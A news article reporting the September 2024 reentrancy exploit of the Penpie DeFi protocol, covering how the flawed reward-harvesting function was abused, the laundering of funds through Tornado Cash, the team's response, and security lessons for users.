Penpie Protocol Drained of $27 Million in Sophisticated Reentrancy Attack

On September 3, 2024, the decentralized finance ecosystem suffered one of its most significant security breaches of the year when Penpie, a yield-enhancement protocol built on the Pendle platform, was exploited for approximately $27 million. The attack exposed critical vulnerabilities in reward distribution mechanisms and served as yet another stark reminder of the risks inherent in DeFi smart contract deployment.

The Exploit Mechanics

The attacker exploited a reentrancy vulnerability in Penpie’s _harvestBatchMarketRewards function, a core component of the protocol’s staking reward system. Reentrancy attacks occur when an external contract is able to call back into the vulnerable function before the initial execution completes, allowing the attacker to manipulate state variables that have not yet been updated.

In this specific case, the attacker deployed a malicious smart contract classified as an “evil market” on the platform. This contract was designed to artificially inflate the attacker’s staking balance on Penpie. By repeatedly calling the vulnerable reward harvesting function before the protocol could update the underlying stake records, the attacker amplified their apparent holdings to claim a significantly larger share of rewards than legitimately entitled to.

The exploited function lacked adequate reentrancy guards — a well-known class of protections that prevent recursive calls during critical state changes. Without these safeguards, the attacker could execute multiple withdrawal cycles within a single transaction, draining millions in crypto assets including ETH and various ERC-20 tokens from the protocol’s liquidity pools.

Affected Systems

Penpie operates as a decentralized application on Ethereum and Arbitrum, built on top of the Pendle Finance platform. The breach impacted users who had staked assets in Penpie’s yield-enhancement vaults. Following the discovery of the exploit, the Penpie team immediately suspended all deposits and withdrawals across the platform, halting operations to prevent further losses.

With Bitcoin trading at approximately $57,431 and Ethereum at $2,420 at the time of the attack, the broader market was already experiencing significant downward pressure. The Penpie exploit added to the negative sentiment, contributing to concerns about DeFi protocol safety during a period of heightened market volatility.

The stolen funds — totaling roughly $27 million — were quickly moved through Tornado Cash, a sanctioned cryptocurrency mixer that obscures transaction origins. Approximately $7 million was laundered through the mixer within hours of the attack, according to blockchain analytics reports.

The Mitigation Strategy

In the immediate aftermath, Penpie’s response team took several steps to contain the damage. The protocol filed official complaints with both the Singapore Police Force and the United States Federal Bureau of Investigation, seeking law enforcement assistance in tracing and recovering the stolen assets.

The team also sent an on-chain message to the attacker, offering a negotiated bounty payment in exchange for the safe return of funds. “We acknowledge your exploit of our protocol,” the message read. “Please contact us to discuss terms confidentially. No legal action will be pursued if the funds are returned.” This approach mirrors strategies employed by other DeFi protocols that have successfully negotiated with hackers in the past.

However, the Penpie hacker showed no intention of returning the stolen assets. In a bizarre twist, the infamous Euler Finance hacker — responsible for a $195 million DeFi heist in 2023 — left an on-chain message praising the Penpie attacker for keeping the funds.

Lessons Learned

The Penpie exploit underscores several critical lessons for the DeFi ecosystem. First, reentrancy vulnerabilities remain one of the most common and devastating attack vectors in smart contract security. Despite being a well-understood class of bugs since the infamous DAO hack of 2016, protocols continue to fall victim to insufficient reentrancy protections.

Second, the speed at which stolen funds were laundered through Tornado Cash highlights the challenges of fund recovery in DeFi. Even with law enforcement involvement, the use of mixing services makes tracing and recovering stolen assets extremely difficult.

Third, the total value lost to crypto hacks in 2024 surpassed $1.2 billion by September, representing a 15.5% increase over the previous year. This upward trend in losses demands a fundamental rethinking of how DeFi protocols approach security auditing and deployment.

User Action Required

If you were a user of Penpie protocol, you should immediately revoke any token approvals granted to Penpie smart contracts. Monitor the official Penpie communication channels for updates on fund recovery efforts and potential reimbursement plans. All DeFi users should regularly review their active token allowances using tools like Revoke.cash or similar platforms, and never grant unlimited approvals unless absolutely necessary.

Disclaimer: This article is for informational purposes only and does not constitute financial or investment advice. Always conduct your own research before engaging with any DeFi protocol.